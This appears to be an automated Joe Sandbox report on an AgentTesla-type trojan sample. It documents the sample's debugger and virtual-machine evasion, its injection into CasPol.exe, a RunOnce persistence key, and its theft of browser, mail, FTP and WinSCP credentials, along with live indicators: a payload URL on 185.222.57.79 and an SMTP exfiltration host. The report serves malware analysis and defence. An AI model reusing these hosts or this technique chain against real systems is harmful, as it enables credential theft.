            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeAPI call chain: ExitProcess graph end nodegraph_1-10096
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeAPI call chain: ExitProcess graph end nodegraph_1-10316
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986099860.0000000003481000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14982548918.00000000007A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeNzP
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000005.00000002.19734742085.000000000133A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.19734954181.0000000001364000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.19734384547.00000000012FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986099860.0000000003481000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14982251535.0000000000768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: CasPol.exe, 00000005.00000002.19736589261.000000000164E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: vmNETFX.ThreadPod
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging

            barindex
            Hides threads from debuggers
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_70E21BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_70E21BFF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339213A rdtsc 1_2_0339213A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398515 mov eax, dword ptr fs:[00000030h]1_2_03398515
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398B6A mov eax, dword ptr fs:[00000030h]1_2_03398B6A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398B95 mov ebx, dword ptr fs:[00000030h]1_2_03398B95
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398B95 mov eax, dword ptr fs:[00000030h]1_2_03398B95
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398D84 mov eax, dword ptr fs:[00000030h]1_2_03398D84
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398BD4 mov ebx, dword ptr fs:[00000030h]1_2_03398BD4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398A3A mov eax, dword ptr fs:[00000030h]1_2_03398A3A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398A08 mov eax, dword ptr fs:[00000030h]1_2_03398A08
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339DAB2 mov eax, dword ptr fs:[00000030h]1_2_0339DAB2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339F0EF mov eax, dword ptr fs:[00000030h]1_2_0339F0EF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339E0D5 mov eax, dword ptr fs:[00000030h]1_2_0339E0D5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339BB26 LdrInitializeThunk,1_2_0339BB26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1100000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000005.00000002.19759760809.000000001D7ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4392, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4392, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000005.00000002.19759760809.000000001D7ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4392, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		3
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API            		1
            Registry Run Keys / Startup Folder            		1
            Access Token Manipulation            		1
            Deobfuscate/Decode Files or Information            		1
            Credentials in Registry            		117
            System Information Discovery            		Remote Desktop Protocol2
            Data from Local System            		Exfiltration Over Bluetooth1
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)111
            Process Injection            		2
            Obfuscated Files or Information            		Security Account Manager431
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		Automated Exfiltration1
            Non-Standard Port            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)1
            Registry Run Keys / Startup Folder            		1
            DLL Side-Loading            		NTDS1
            Process Discovery            		Distributed Component Object Model1
            Clipboard Data            		Scheduled Transfer2
            Non-Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script361
            Virtualization/Sandbox Evasion            		LSA Secrets361
            Virtualization/Sandbox Evasion            		SSHKeyloggingData Transfer Size Limits122
            Application Layer Protocol            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Access Token Manipulation            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items111
            Process Injection            		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 635338 Sample: SecuriteInfo.com.Trojan.Inj... Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 26 mail.parkhotelizmir.com 2->26 32 Snort IDS alert for network traffic 2->32 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 5 other signatures 2->38 8 SecuriteInfo.com.Trojan.Inject.11626.exe 3 28 2->8         started        signatures3 process4 file5 22 C:\Users\user\AppData\Local\...\System.dll, PE32 8->22 dropped 24 C:\Users\user\AppData\...\ThrottlePlugin.dll, PE32+ 8->24 dropped 40 Writes to foreign memory regions 8->40 42 Tries to detect Any.run 8->42 44 Hides threads from debuggers 8->44 12 CasPol.exe 1 13 8->12         started        16 CasPol.exe 8->16         started        18 CasPol.exe 8->18         started        signatures6 process7 dnsIp8 28 185.222.57.79, 49754, 80 ROOTLAYERNETNL Netherlands 12->28 30 mail.parkhotelizmir.com 45.10.148.33, 49763, 587 EKSENBILISIMTR Turkey 12->30 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->46 48 Tries to steal Mail credentials (via file / registry access) 12->48 50 Tries to harvest and steal ftp login credentials 12->50 56 3 other signatures 12->56 20 conhost.exe 12->20         started        52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->52 54 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->54 signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Trojan.Inject.11626.exe12%VirustotalBrowse
            SecuriteInfo.com.Trojan.Inject.11626.exe5%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsg40B0.tmp\System.dll3%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\nsg40B0.tmp\System.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            mail.parkhotelizmir.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            http://185.222.57.79/SALES/muhasebe0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            https://api.ipify.org%40%Avira URL Cloudsafe
            http://2HBIa742d4finT.com0%Avira URL Cloudsafe
            http://mail.parkhotelizmir.com0%Avira URL Cloudsafe
            https://api.ipify.org%GETMozilla/5.00%Avira URL Cloudsafe
            http://yogqTE.com0%Avira URL Cloudsafe
            http://185.222.57.79/SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin0%Avira URL Cloudsafe
            http://185.222.57.79/SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin10%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            mail.parkhotelizmir.com
            		45.10.148.33
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://185.222.57.79/SALES/muhasebe@par%20v4_zZlYyWbWEF39.bintrue
            • Avira URL Cloud: safe
            		unknown
            http://185.222.57.79/SALES/muhasebe@par%20v4_zZlYyWbWEF39.bin1true
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://creativecommons.org/ns#DerivativeWorksSecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
              		high
              http://127.0.0.1:HTTP/1.1CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		low
              http://DynDns.comDynDNSCasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://creativecommons.org/licenses/by-sa/4.0/user-not-tracked-symbolic.svg.1.drfalse
                		high
                http://creativecommons.org/ns#DistributionSecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                  		high
                  http://185.222.57.79/SALES/muhasebeCasPol.exe, 00000005.00000002.19734742085.000000000133A000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://creativecommons.org/ns#AttributionSecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                    		high
                    https://api.ipify.org%4CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://2HBIa742d4finT.comCasPol.exe, 00000005.00000002.19759961032.000000001D813000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://creativecommons.org/ns#ShareAlikeSecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                      		high
                      http://mail.parkhotelizmir.comCasPol.exe, 00000005.00000002.19760423479.000000001D872000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://api.ipify.org%GETMozilla/5.0CasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Trojan.Inject.11626.exe, FRATERNATE.exe.5.drfalse
                        		high
                        http://creativecommons.org/ns#NoticeSecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                          		high
                          http://creativecommons.org/ns#ReproductionSecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                            		high
                            http://yogqTE.comCasPol.exe, 00000005.00000002.19758765647.000000001D731000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://creativecommons.org/ns#SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.drfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.222.57.79
                              		unknownNetherlands
                              		51447ROOTLAYERNETNLtrue
                              45.10.148.33
                              		mail.parkhotelizmir.comTurkey
                              		208485EKSENBILISIMTRtrue

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:635338
                              Start date and time: 27/05/202219:38:482022-05-27 19:38:48 +02:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 13m 32s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:SecuriteInfo.com.Trojan.Inject.11626.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Run name:Suspected Instruction Hammering
                              Number of analysed new started processes analysed:21
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@8/13@1/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 26.2% (good quality ratio 25.6%)
                              • Quality average: 89%
                              • Quality standard deviation: 20.8%
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 127
                              • Number of non-executed functions: 59
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Adjust boot time
                              • Enable AMSI

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wdcpalt.microsoft.com, client.wns.windows.com, ctldl.windowsupdate.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              19:41:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\FRATERNATE.exe
                              19:41:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\FRATERNATE.exe
                              19:41:16API Interceptor2748x Sleep call for process: CasPol.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              185.222.57.79SecuriteInfo.com.Trojan.Inject.3564.exeGet hashmaliciousBrowse
                              • 185.222.57.79/SALES/1%20FEB%202-22_jalPPiWqFb130.bin
                              SecuriteInfo.com.Variant.Babar.54324.15185.exeGet hashmaliciousBrowse
                              • 185.222.57.79/SALES/NEW%20SERVER_KeqToKFS234.bin
                              45.10.148.33Tq9MQmwr7p.exeGet hashmaliciousBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                mail.parkhotelizmir.comSecuriteInfo.com.W32.AIDetectNet.01.13550.exeGet hashmaliciousBrowse
                                • 45.10.148.33
                                SecuriteInfo.com.W32.AIDetectNet.01.3778.exeGet hashmaliciousBrowse
                                • 45.10.148.33
